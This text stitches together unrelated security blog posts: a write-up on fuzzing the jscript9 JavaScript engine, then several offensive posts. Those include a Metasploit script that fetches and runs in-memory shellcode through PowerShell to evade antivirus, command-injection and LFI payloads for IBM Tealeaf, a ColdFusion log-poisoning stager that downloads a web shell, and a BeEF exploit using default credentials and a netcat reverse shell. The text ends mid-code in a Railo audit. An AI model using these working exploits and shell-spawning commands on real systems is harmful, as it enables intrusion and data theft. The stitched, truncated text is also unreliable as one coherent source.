Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on Windows builds exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift build on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examples on how to do this, once again from Saleem Abdulrasool.

Another feature that didn’t make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That’s why, in the end, TinyInst was built separately into a .dll and this .dll loaded “manually” into Fuzzilli via the LoadLibrary API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific quirk of the Windows debugging API, for example WaitForDebugEvent, is that it does not take a debuggee pid or a process handle as an argument. So then, the question is, if you have multiple debuggees, to which of them does the API call refer? The answer is that, when a debugger on Windows attaches to a debuggee (or starts a debuggee process), the thread that started/attached it is the debugger. Any subsequent calls for that particular debuggee need to be issued on that same thread.

In contrast, the preferred Swift coding style (which Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on “background” threads. However, with background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance were made from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdout redirection and a channel for reading out the “status” of JavaScript execution (specifically, to be able to tell if the JavaScript code threw an exception or executed successfully). Some of these features were already integrated into the “mainline” TinyInst or will be integrated in the future.

After all of that was completed, though, the Fuzzilli/TinyInst hybrid was running in a stable manner:

Note that the coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

Jackalope is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing more closely how Fuzzilli works during Approach 1, as well as observing the samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing and, in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this page and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, but also sample minimization, are the <repeat_*> grammar nodes. A <repeat_x> symbol tells the grammar engine that it can be represented as zero or more <x> nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist> can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement> expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement> node anywhere in the <statementlist> node. It can also remove <statement> nodes from the <statementlist> node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*> nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case with the JavaScript grammar.
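
For illustration, a hypothetical fragment in this grammar syntax (my own example using made-up <varname> and <expression> symbols, not taken from the project's actual JavaScript grammar) might look like:

<statementlist> = <repeat_statement>
<statement> = var <varname> = <expression>;
<statement> = <varname>.toString();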

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g. when storing it to disk, but does so by serializing the tree and deserializing when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*> node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*> node from the current sample and a similar <repeat_*> node from another sample. Mixes children from the other node into the current node.

The JavaScript grammar was initially constructed by following the ECMAScript 2022 specification. However, as always when constructing fuzzing grammars from specifications or in a (semi)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and generate interesting samples more frequently.

Jackalope now supports grammar fuzzing out of the box; in order to use it, you just need to add -grammar <path_to_grammar_file> to Jackalope’s command line. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer Coverage based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.

Jackalope running against jscript9.

Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419 and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debugging was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability report for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 early in the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contains anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible as demonstrated above, it does have its limitations. The biggest one is the inability to compile the target with additional debug checks. Most of the modern open-source JavaScript engines include additional checks that can be compiled in if needed, which enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If the jscript9 source code includes such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page Heap for the target. However, it does not work well here. The reason is that jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines, is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, the Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community thinks would benefit from a mutation-based approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or the Internet Explorer engine) integrated into various other products (most notably Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

introduction

3 March 2014 at 05:51

This isn’t a real introduction post, just a note that I’m migrating from Google Blogger to Github Pages with Octopress. So far it’s great. I’m going to be slowly migrating all posts over from Blogger into here, though I may skip a few early posts that aren’t as interesting.

Hopefully it provides me with the functionality that I’ve been looking for.

meterpreter shell upgrades using powershell

11 March 2014 at 04:31

One of my primary goals during development of clusterd was ensuring reliability and covertness during remote deploys. It’s no secret that antivirus routinely eats vanilla Meterpreter shells. For this, the --gen-payload flag generates a war file with java/jsp_shell_reverse_tcp tucked inside. This payload is used because it’s largely undetected by AV, and our environments are perfectly suited for it. However, Meterpreter is a fantastic piece of software, and it’d be nice to be able to elevate from this simple JSP shell into it.

Metasploit has a solution for this, sort of. sessions -u can be used to upgrade an existing shell session into a full-blown Meterpreter. Unfortunately, the current implementation uses Rex::Exploitation::CmdStagerVBS, which writes the executable to disk and executes it. This is almost always immediately popped by most enterprise-grade (and even most consumer-grade) AVs. For this, we need a new solution.

The easiest solution is Powershell; this allows us to execute shellcode completely in memory, without ever writing files to disk. I used Obscure Security’s canonical post on it for my implementation. The only real problem is portability, as Powershell doesn’t exist on Windows XP. This could be mitigated by patching in shellcode via Java, but that’s another post for another time.

Right, so how’s this work? We essentially execute a Powershell command in the running session (our generic shell) that fetches a payload from a remote server and executes it. Our payload in this case is Invoke-Shellcode, from the PowerSploit package. This bit of code will generate our reverse HTTPS meterpreter shell and inject it into the current process ID. Our command looks like this:

cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc %s

Our encoded payload is:

iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')

IEX, or Invoke-Expression, is just an eval operation. In this case, we’re fetching a URL and executing it. This is a totally transparent, completely in-memory solution. Let’s have a look at it running:

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information                                                                       Connection
  --  ----         -----------                                                                       ----------
  1   shell linux  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  192.168.1.6:4444 -> 192.168.1.102:60911 (192.168.1.102)

msf exploit(handler) > 

We see above that we currently have a generic shell (it’s the java/jsp_shell_reverse_tcp payload) on a Windows 7 system (which happens to be running MSE). Using this new script, we can upgrade this session to Meterpreter:

msf exploit(handler) > sessions -u 1

[*] Started HTTPS reverse handler on https://0.0.0.0:53568/
[*] Starting the payload handler...
[*] 192.168.1.102:60922 Request received for /INITM...
[*] 192.168.1.102:60922 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 2 opened (192.168.1.6:53568 -> 192.168.1.102:60922) at 2014-03-11 23:09:36 -0600
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

And just like that, without a peep from MSE, we’ve got a Meterpreter shell.

You can find the code for this implementation below, though be warned: this is PoC-quality code, and probably even worse as I’m not really a Ruby developer. Meatballs over at Metasploit has a few awesome Powershell pull requests waiting for a merge. Once that’s done, I can implement it here and submit a proper implementation. If you’d like to try this out, simply create a backup copy of scripts/shell/spawn_meterpreter.rb, copy in the following, then reload. You should be upgradin’ and bypassin’ in no time.

#
# Session upgrade using Powershell IEX
# 
# Some code stolen from jduck's original implementation
#
# -drone
#

class HTTPServer
    #
    # Using Ruby HTTPServer here since this isn't a module, and I can't figure
    # out how to use MSF libs in here
    #
    @sent = false
    def state
        return @sent
    end

    def initialize(port, body)
        require 'socket'

        @sent = false
        @server = Thread.new do
            server = TCPServer.open port
            loop do
                client = server.accept
                content_type = "text/plain"
                client.puts "HTTP/1.0 200 OK\r\nContent-type: #{content_type}"\
                            "\r\nContent-Length: #{body.length}\r\n\r\n#{body}"\
                            "\r\n\r\n"
                sleep 5
                client.close
                kill
            end
        end
     end

     def kill!
        @sent = true
        @server.kill
     end

     alias :kill :kill!
end

#
# Returns if a port is used by a session
#
def is_port_used?(port)
    framework.sessions.each do |sid, obj|
       local_info = obj.instance_variable_get(:@local_info)
       return true if local_info =~ /:#{port}$/
    end

    false
end

def start_http_service(port)
    @server = HTTPServer.new(port, @pl)
end

def wait_payload

    waited = 0
    while (not @server.state)
        select(nil, nil, nil, 1)
        waited += 1
        if (waited > 10) # MAGIC NUMBA
            @server.kill
            raise RuntimeError, "No payload requested"
        end
    end
end

def generate(host, port, sport)
    require 'net/http'

    script_block = "iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')" % [host, sport]
    cmd = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol %s" % script_block

    # generate powershell payload
    url = URI.parse('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
    req = Net::HTTP::Get.new(url.path)
    http = Net::HTTP.new(url.host, url.port)
    http.use_ssl = true

    res = http.request(req)

    if !res or res.code != '200'
      raise RuntimeError, "Could not retrieve Invoke-Shellcode"
    end

    @pl = res.body
    @pl << "\nInvoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force" % [host, port]
    return cmd
end


#
# Mimics what MSF already does if the user doesn't manually select a payload and lhost
#
lhost = framework.datastore['LHOST']
unless lhost
  lhost = Rex::Socket.source_address
end

#
# If there is no LPORT defined in framework, then pick a random one that's not used
# by current sessions. This is possible if the user assumes module datastore options
# are the same as framework datastore options.
#
lport = framework.datastore['LPORT']
unless lport
  lport = 4444 # Default meterpreter port
  while is_port_used?(lport)
    # Pick a port that's not used
    lport = [*49152..65535].sample
  end
end

# do the same from above, but for the server port
sport = [*49152..65535].sample
while is_port_used?(sport)
    sport = [*49152..65535].sample
end

# maybe we want our sessions going to another instance?
use_handler = true
use_handler = nil if (session.exploit_datastore['DisablePayloadHandler'] == true)

#
# Spawn the handler if needed
#
aborted = false
begin

  mh = nil
  payload_name = 'windows/meterpreter/reverse_https'
  if (use_handler)
      mh = framework.modules.create("exploit/multi/handler")
      mh.datastore['LPORT'] = lport
      mh.datastore['LHOST'] = lhost
      mh.datastore['PAYLOAD'] = payload_name
      mh.datastore['ExitOnSession'] = false
      mh.datastore['EXITFUNC'] = 'process'
      mh.exploit_simple(
        'LocalInput'     => session.user_input,
        'LocalOutput'    => session.user_output,
        'Payload'        => payload_name,
        'RunAsJob'       => true)
      # It takes a little time for the resources to get set up, so sleep for
      # a bit to make sure the exploit is fully working.  Without this,
      # mod.get_resource doesn't exist when we need it.
      select(nil, nil, nil, 0.5)
      if framework.jobs[mh.job_id.to_s].nil?
        raise RuntimeError, "Failed to start multi/handler - is it already running?"
      end
    end

    # Generate our command and payload
    cmd = generate(lhost, lport, sport)

    # start http service
    start_http_service(sport)

    sleep 2 # give it a sec to startup

    # execute command
    session.run_cmd(cmd)

    if not @server.state
        # wait...
        wait_payload
    end

rescue ::Interrupt
  # TODO: cleanup partial uploads!
  aborted = true
rescue => e
  print_error("Error: #{e}")
  aborted = true
end

#
# Stop the job
#
if (use_handler)
  Thread.new do
    if not aborted
      # Wait up to 10 seconds for the session to come in..
      select(nil, nil, nil, 10)
    end
    framework.jobs.stop_job(mh.job_id)
  end
end

Update 09/06/2014

Tom Sellers submitted a PR on 05/29 that implements the above nicely. It appears to support a large swath of platforms, but only a couple support no-disk-write methods, namely the Powershell method.

IBM Tealeaf CX (v8 Release 8) Remote OS Command Injection / LFI

27 March 2014 at 05:51

Tealeaf Technologies, purchased by IBM in May 2012, makes a customer buying analytics application. Essentially, an administrator will configure a Tealeaf server that accepts analytic data from remote servers, from which it then generates various models, graphs, reports, etc. based on the aggregated data. The analytics status/server monitoring application is vulnerable to a fairly trivial OS command injection vulnerability, as well as local file inclusion. These vulnerabilities were discovered on a PCI engagement against a large retailer; the LFI was used to pull PHP files and hunt for RCE.

The entire application is served up by default on port 8080 and is developed in PHP. Authentication is disabled by default, though support for Basic Auth appears to exist. This interface allows administrators access to statistics, logs, participating servers, and more. Contained therein is the ability to obtain application logs, such as configuration, maintenance, access, and more. The log parameter is vulnerable to LFI:

if(array_key_exists("log", $params))
$path = $config->logfiledir() . "/" . $params["log"];


$file = basename($path);
$size = filesize($path);

// Set the cache-control and expiration date so that the file expires
// immediately after download.
//
$rfc1123date = gmdate('D, d M Y H:i:s T', 1);
header('Cache-Control: max-age=0, must-revalidate, post-check=0, pre-check=0');
header("Expires: " . $rfc1123date);

header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$file;");
header("Content-Length: $size;");

readfile($path);

The URL then is http://host:8080/download.php?log=../../../etc/passwd
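
A minimal sketch of pulling a file through this LFI, assuming a hypothetical target host (the download.php path and log parameter come straight from the code above):

import requests

# Hypothetical target; download.php serves whatever file the 'log' parameter
# names, relative to the log directory, with no sanitization.
url = 'http://192.168.1.50:8080/download.php'
resp = requests.get(url, params={'log': '../../../etc/passwd'})
print resp.text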

Tealeaf also suffers from a rather trivial remote OS command injection vulnerability. Under the Delivery tab, there exists the option to ping remote servers that send data back to the mothership. Do you see where this is going?

if ($_POST["perform_action"] == "testconn") {
    $host = $_POST["testconn_host"];
    $port = $_POST["testconn_port"];
    $use_t = strtolower($_POST["testconn_t"]) == "true" ? true : false;
    $command = $GLOBALS["config"]->testconn_program() . ' ';
    if($use_t)
    $output = trim(shell_command_output($command . $host . " -p " . $port . " -t"));
    else
    $output = trim(shell_command_output($command . $host . " -p " . $port));

    if($output != "") {
        $alert_function = "alert('" . str_replace("\n", "\\n",
        htmlentities($output, ENT_QUOTES)) . "')";
    }

    $_SESSION['delivery']->pending_changes = $orig_pending_changes;
}

And shell_command_output:

function shell_command_output($command) {
    $result = `$command 2>&1`;
    if (strlen($result) > 0)
    return $result;
}

Harnessing the $host variable, we can inject arbitrary commands to run under the context of the process user, which by default is ctccap. In order to exploit this without hanging processes or goofing up flow, I injected the following as the host variable: 8.8.8.8 -c 1 ; whoami ; ping 8.8.8.8 -c 1.
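
A rough sketch of what that request might look like, assuming a hypothetical endpoint path for the Delivery tab (the perform_action/testconn_* field names are taken from the vulnerable PHP handler above; the exact URL will vary by install):

import requests

# Hypothetical endpoint path; the injected commands ride along in testconn_host.
url = 'http://192.168.1.50:8080/delivery.php'
data = {
    'perform_action' : 'testconn',
    'testconn_host'  : '8.8.8.8 -c 1 ; whoami ; ping 8.8.8.8 -c 1',
    'testconn_port'  : '80',
    'testconn_t'     : 'false',
}
resp = requests.post(url, data=data)
print resp.text  # command output is reflected back in the alert() javascript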

Timeline

  • 11/08/2013: IBM vulnerability submitted
  • 11/09/2013: IBM acknowledges vulnerability and assigns internal advisory ID
  • 12/05/2013: Request for status update
  • 01/06/2014: Second request for status update
  • 01/23/2014: IBM responds with a target patch date set for β€œanother few months”
  • 03/26/2014: IBM posts advisory, assigns CVE-2013-6719 and CVE-2013-6720

Advisory
exploit-db PoC

LFI to shell in Coldfusion 6-10

2 April 2014 at 21:10

ColdFusion has several very popular LFI’s that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser use of this LFI, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left?

The less-than-obvious solution is to exploit CFML’s parser, which acts much in the same way that PHP does when used in HTML. You can embed PHP into any HTML page, at any location, because of the way the PHP interpreter searches a document for executable code. This is the foundational basis of log poisoning. CFML acts in much the same way, and we can use these LFI’s to inject CFML and execute it on the remote system.

Let’s begin by first identifying the LFI; I’ll be using ColdFusion 8 as example. CF8’s LFI lies in the locale parameter:

http://192.168.1.219:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../ColdFusion8\logs\application.log%00en

When exploited, this will dump the contents of application.log, a logging file that stores error messages.

We can write to this file by triggering an error, such as attempting to access a nonexistent CFML page. This log also fails to sanitize data, allowing us to inject any characters we want, including CFML code.

The idea for this is to inject a simple stager payload that will then pull down and store our real payload; in this case, a web shell (something like fuze). The stager I came up with is as follows:

<cfhttp method='get' url='#ToString(ToBinary('aHR0cDovLzE5Mi4xNjguMS45Nzo4MDAwL2NtZC5jZm1s'))#' path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#' file='cmd.cfml'>

The cfhttp tag is used to execute an HTTP request for our real payload, the URL of which is base64'd to avoid some encoding issues with forward slashes. We then expand the local path to ../../, which drops us into wwwroot, the first directory accessible from the web server.

Once the stager is injected, we only need to exploit the LFI to retrieve the log file and execute our CFML code:
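
A sketch of the full flow, assuming the error handler logs the requested path verbatim into application.log (the stager and paths come from above):

import requests
from urllib import quote

base = 'http://192.168.1.219:8500'
stager = ("<cfhttp method='get' url='#ToString(ToBinary("
          "'aHR0cDovLzE5Mi4xNjguMS45Nzo4MDAwL2NtZC5jZm1s'))#' "
          "path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#' file='cmd.cfml'>")

# 1. Request a nonexistent page containing the stager so it lands in application.log
requests.get(base + '/CFIDE/administrator/' + quote(stager) + '.cfm')

# 2. Pull the poisoned log back through the locale LFI; the CFML parser
#    finds the stager tag in the log and executes it
requests.get(base + '/CFIDE/administrator/enter.cfm?locale='
             '../../../../../../../../ColdFusion8\\logs\\application.log%00en')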

Which we can then access from the root directory:

A quick run of this in clusterd:

$ ./clusterd.py -i 192.168.1.219 -a coldfusion -p8500 -v8 --deployer lfi_stager --deploy ./src/lib/resources/cmd.cfml 

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 5 platforms]

 [2014-04-02 11:28PM] Started at 2014-04-02 11:28PM
 [2014-04-02 11:28PM] Servers' OS hinted at windows
 [2014-04-02 11:28PM] Fingerprinting host '192.168.1.219'
 [2014-04-02 11:28PM] Server hinted at 'coldfusion'
 [2014-04-02 11:28PM] Checking coldfusion version 8.0 ColdFusion Manager...
 [2014-04-02 11:28PM] Matched 1 fingerprints for service coldfusion
 [2014-04-02 11:28PM]   ColdFusion Manager (version 8.0)
 [2014-04-02 11:28PM] Fingerprinting completed.
 [2014-04-02 11:28PM] Injecting stager...
 [2014-04-02 11:28PM] Waiting for remote server to download file [7s]]
 [2014-04-02 11:28PM] cmd.cfml deployed at /cmd.cfml
 [2014-04-02 11:28PM] Finished at 2014-04-02 11:28PM

The downside to this method is the residue left in a log file, which cannot be purged unless the CF server is shut down (except in CF10). It also means that the CFML file, if using the web shell, will be hanging around the filesystem. An alternative is to inject a web shell that exists on-demand; that is, one that checks whether an argument is provided to the LFI and only parses and executes then.

A working deployer for this can be found in the latest release of clusterd (v0.2.1). It is also worth noting that this method is applicable to other CFML engines; details on that, and a working proof of concept, in the near future.

rce in browser exploitation framework (BeEF)

14 May 2014 at 02:57

Let me preface this post by saying that this vulnerability is already fixed, and was caught pretty early during the development process. The vulnerability was originally introduced during a merge for the new DNS extension, and was promptly patched by antisnatchor on 03/02/2014. Although this vulnerability was caught fairly quickly, it still made it into the master branch. I post this only because I've seen too many penetration testers leaving their tools externally exposed, often with default credentials.

The vulnerability is a trivial one, but is capable of returning a reverse shell to an attacker. BeEF exposes a REST API for modules and scripts to use; useful for dumping statistics, pinging hooked browsers, and more. It’s quite powerful. This can be accessed by simply pinging http://127.0.0.1:3000/api/ and providing a valid token. This token is static across a single session, and can be obtained by sending a POST to http://127.0.0.1:3000/api/admin/login with appropriate credentials. Default credentials are beef:beef, and I don’t know many users that change this right away. It’s also of interest to note that the throttling code does not exist in the API login routine, so a brute force attack is possible here.
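
Since the throttling is missing, brute-forcing the API login takes only a few lines (host and wordlist are hypothetical; the endpoint and response format match the PoC later in this post):

import json
import requests

url = 'http://192.168.1.6:3000/api/admin/login'
headers = { 'Content-Type' : 'application/json; charset=UTF-8' }

for password in ['beef', 'admin', 'password', 'changeme']:
    data = { 'username' : 'beef', 'password' : password }
    resp = requests.post(url, headers=headers, data=json.dumps(data))
    if resp.status_code == 200 and json.loads(resp.content)['success']:
        print 'valid: beef:%s token=%s' % (password, json.loads(resp.content)['token'])
        break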

The vulnerability lies in one of the exposed API functions, /rule. The code for this was as follows:

# Adds a new DNS rule
        post '/rule' do
          begin
            body = JSON.parse(request.body.read)

            pattern = body['pattern']
            type = body['type']
            response = body['response']

            # Validate required JSON keys
            unless [pattern, type, response].include?(nil)
              # Determine whether 'pattern' is a String or Regexp
              begin

                pattern_test = eval pattern
                pattern = pattern_test if pattern_test.class == Regexp
   #             end
              rescue => e;
              end

The obvious flaw is the eval on user-provided data. We can exploit this by POSTing a new DNS rule with a malicious pattern:

import requests
import json
import sys

def fetch_default(ip):
    url = 'http://%s:3000/api/admin/login' % ip
    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'username' : 'beef', 'password' : 'beef' }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    if response.status_code == 200 and json.loads(response.content)['success']:
        return json.loads(response.content)['token']

try:
    ip = '192.168.1.6'

    if len(sys.argv) > 1:
        token = sys.argv[1]
    else:
        token = fetch_default(ip)

    if not token:
        print 'Could not get auth token'
        sys.exit(1)

    url = 'http://%s:3000/api/dns/rule?token=%s' % (ip, token)
    sploit = '%x(nc 192.168.1.97 4455 -e /bin/bash)'

    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'pattern' : sploit,
             'type' : 'A',
             'response' : [ '127.0.0.1' ]
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code
except Exception, e:
    print e

You could execute ruby to grab a shell, but BeEF restricts some of the functions we can use (such as exec or system).

There’s also an instance of LFI, this time using the server API. /api/server/bind allows us to mount files at the root of the BeEF web server. The path defaults to the current path, but can be traversed out of:

def run_lfi(ip, token):
    url = 'http://%s:3000/api/server/bind?token=%s' % (ip, token)
    headers = { 'Content-Type' : 'application/json'}
    data = { 'mount' : "/tmp.txt",
             'local_file' : "/../../../etc/passwd"
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code

We can then hit our server at /tmp.txt for /etc/passwd. Though this appears to be intended behavior, and perhaps labeling it an LFI is a misnomer, it is still yet another example of why you should not expose these tools externally with default credentials. Default credentials are just bad, period. Stop it.

railo security - part one - intro

25 June 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

Railo is an open-source alternative to the popular Coldfusion application server, implementing a FOSSy CFML engine and application server. It emulates Coldfusion in a variety of ways, with many features coming straight from the CF world, along with several of its own unique features (clustered servers, a plugin architecture, etc). In this four-part series, we'll touch on how Railo, much like Coldfusion, can be used to gain access to a system or network of systems. I will also be examining several pre-authentication RCE vulnerabilities discovered in the platform during this audit. I'll be pimping clusterd throughout to exemplify how it can help achieve some of these goals. These posts are the result of a combined effort between myself and Stephen Breen (@breenmachine).

I’ll preface this post with a quick rundown on what we’re working with; public versions of Railo run from versions 3.0 to 4.2, with 4.2.1 being the latest release as of posting. The code is also freely available on Github; much of this post’s code samples have been taken from the 4.2 branch or the master. Hashes:

$ git branch
* master
$ git rev-parse master
694e8acf1a762431eab084da762a0abbe5290f49

And a quick rundown of the code:

$ cloc ./
    3689 text files.
    3571 unique files.                                          
     151 files ignored.

http://cloc.sourceforge.net v 1.60  T=7.74 s (452.6 files/s, 60622.4 lines/s)
---------------------------------------------------------------------------------
Language                       files          blank        comment           code
---------------------------------------------------------------------------------
Java                            2786          66639          69647         258015
ColdFusion                       315           5690           3089          35890
ColdFusion CFScript              352           4377            643          15856
XML                               22            526            563           5773
Javascript                        14             46            252            733
Ant                                4             38             70            176
DTD                                4            283            588            131
CSS                                5             52             16             77
HTML                               1              0              0              1
---------------------------------------------------------------------------------
SUM:                            3503          77651          74868         316652
---------------------------------------------------------------------------------

Railo has two separate administrative web interfaces; server and web. The two interfaces segregate functionality out into these categories; managing the actual server and managing the content served up by the server. Server is available at http://localhost:8888/railo-context/admin/server.cfm and web is available at http://localhost:8888/railo-context/admin/web.cfm. Both interfaces are configured with a single, shared password that is set AFTER the site has been initialized. That is, the first person to hit the web server gets to choose the password.

Authentication

As stated, authentication requires only a single password, but locks an IP address out if too many failed attempts are performed. The exact logic for this is as follows (web.cfm):

<cfif loginPause and StructKeyExists(application,'lastTryToLogin') and IsDate(application.lastTryToLogin) and DateDiff("s",application.lastTryToLogin,now()) LT loginPause>
        <cfset login_error="Login disabled until #lsDateFormat(DateAdd("s",loginPause,application.lastTryToLogin))# #lsTimeFormat(DateAdd("s",loginPause,application.lastTryToLogin),'hh:mm:ss')#">
    <cfelse>

